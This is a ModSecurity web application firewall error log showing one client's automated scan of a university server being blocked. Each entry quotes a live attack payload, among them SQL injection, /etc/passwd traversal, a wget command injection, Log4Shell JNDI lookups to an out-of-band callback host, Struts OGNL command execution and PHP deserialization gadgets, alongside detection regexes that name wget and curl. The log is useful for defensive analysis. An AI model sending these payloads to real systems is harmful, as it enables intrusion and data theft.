[Tue Aug 29 11:34:52.326256 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAASEJXgAAAAE"]
[Tue Aug 29 11:34:53.341624 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgdo58h6m14pt6e.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATXLL4AAAAb"]
[Tue Aug 29 11:34:53.360792 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAATzVIgAAAAx"]
[Tue Aug 29 11:34:53.479738 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAVK0G4AAAAB"]
[Tue Aug 29 11:34:55.316939 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAT9PPAAAAA1"]
[Tue Aug 29 11:34:56.342398 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAULx8cAAABD"]
[Tue Aug 29 11:34:56.396650 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUKhAcAAABC"]
[Tue Aug 29 11:34:57.312714 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAAT@KwEAAAA2"]
[Tue Aug 29 11:34:57.355900 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUTiYMAAABJ"]
[Tue Aug 29 11:34:57.384021 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAAUTiYQAAABJ"]
[Tue Aug 29 11:34:58.320341 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAT2JQ4AAAAz"]
[Tue Aug 29 11:34:58.359296 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAARdiTAAAAAK"]
[Tue Aug 29 11:34:59.337126 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATzVJEAAAAx"]
[Tue Aug 29 11:35:01.327204 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUNalMAAABF"]
[Tue Aug 29 11:35:02.335771 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAATOA@oAAAAH"]
[Tue Aug 29 11:35:02.355757 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUUZ84AAABK"]
[Tue Aug 29 11:35:03.307594 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAVPX28AAAAF"]
[Tue Aug 29 11:35:03.320583 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUdm4gAAABS"]
[Tue Aug 29 11:35:04.322955 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAAVPX3EAAAAF"]
[Tue Aug 29 11:35:04.327391 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUDQT8AAAA7"]
[Tue Aug 29 11:35:05.325328 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgmu18b5gd39cjy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAATUxSEAAAAW"]
[Tue Aug 29 11:35:05.355093 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgkz3a4uawkfmu6.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAASOUqMAAAAR"]
[Tue Aug 29 11:35:06.353639 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgp5c6zwz1c5trn.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgp5c6zwz1c5trn.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAVK0H4AAAAB"]
[Tue Aug 29 11:35:07.321924 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAT2JRsAAAAz"]
[Tue Aug 29 11:35:07.359358 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUKhBEAAABC"]
[Tue Aug 29 11:35:08.327579 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAVWP-cAAAAV"]
[Tue Aug 29 11:35:09.354032 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAVWP-kAAAAV"]
[Tue Aug 29 11:35:10.358162 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAT@KwgAAAA2"]
[Tue Aug 29 11:35:10.359794 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUbg18AAABQ"]
[Tue Aug 29 11:35:11.299145 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11f8Co-f0AAAPLwK0AAAAX"]
[Tue Aug 29 11:35:12.358920 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATWYTAAAAAa"]
[Tue Aug 29 11:35:12.479781 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATUxSwAAAAW"]
[Tue Aug 29 11:35:12.697080 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATUxSwAAAAW"]
